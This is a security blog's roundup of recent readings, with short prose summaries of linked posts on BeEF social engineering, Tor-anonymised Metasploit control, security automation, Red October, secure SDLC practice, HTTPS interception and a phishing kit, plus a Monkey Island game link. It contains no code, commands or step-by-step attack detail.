Recent Readings on BeEF, MetasploiTor, Automation, SDLCs, Phishingggggggg
First off the bat is a couple of posts that I've had direct (some would say intimate) involvement.
BeEF QR Fun - Summarising some of the salient points from my OWASP AppSecAPAC 2012 presentation (Shake Hooves with BeEF), I finally pulled my finger out and posted for the BeEF blog. Mainly focusing on custom mount points in BeEF with iFrame target-site impersonation, plus a dabbling of QR-codedness, the post hopes to demonstrate a few different methods to fit BeEF into your social engineering methodology.
Anonymous Post-Compromise Control via Tor Hidden Services - My colleague Dave somehow managed to wrangle up an opus on utilising Tor to anonymise backdoor connectivity to compromised hosts over the Christmas period. Knowing Dave's relationship with beer I'm surprised that he still had the brain power to push this out (:P). If you have any interest in Metasploit and Tor then you should check out his post.
And now onto other security stuff..
Minion - Automating Security for Developers - There are a few different open source security automation projects going on at the moment (I mentioned Codesake recently), but this one looks pretty interesting. It seems to be fairly modular (currently appears to interface with ZAP, Skipfish and Garmr. The demo video seems really interesting, very point and click. For developers, this may be an ideal 'step' in their SDLC to catch bugs sooner.
Red October - There's been quite a bit of noise about this attack recently. This was one of the first blog posts I read that seemed to provide a clear summary, with further links into the Kaspersky reports. This long-term campaign has apparently been targeting embassies and other governmental agencies (including defence) for the past 5 years.
Non-Negotiable Elements of a Secure Software Development Process: Part 2 - Nick Coblentz has been posting these great articles on elements of a secure systems or software development lifecycle which are non-negotiable. Part 1 started with security requirements, while this post is focused on security architecture, configuration and other patterns. If you're working on embedding security into your development lifecycle definitely keep in the loop on Nick's posts.
Man-in-the-Middle Attacks Against Browser Encryption - Schneier recently posted a summary of how Nokia are intercepting HTTPS channels to offer better data transmission speeds over slower networks through compression and other means. This is really similar to a 2009 post of mine talking about how Opera Mini was doing the same thing.
Defeating AES Without a PhD - Dan Crowley writes up an excellent post on leveraging some of Burp's more tricky intruder settings to understand (and attack) encrypted parameters within web apps. (Dan's a great guy, was happy to have a few beers with him while he was down in Sydney last year).
Bouncer's Laser Precision Phishing - RSA have posted an article on a particular phishing kit (i.e. pre-canned tool used to create or implement phishing sites) which utilises unique URL links for each recipient (so this kit includes the email/spam component too) to ensure that the site is only accessible (at least initially) by the victim. I'm sure there are ways to bypass this, but, it certainly may fool some simple phishing detection tools (such as used by finance or other sectors when they analysis abuse mailboxes or email bounce backs etc).
Okay, enough with the security stuff .. (Fine! .. here's one article..)
Monkey Island Insult Swordfighter in your Browser - for those fans of the original Monkey Island point and click adventure games you should check this out! This guy has dumped in browser form a collection of the sword-fighting challenges..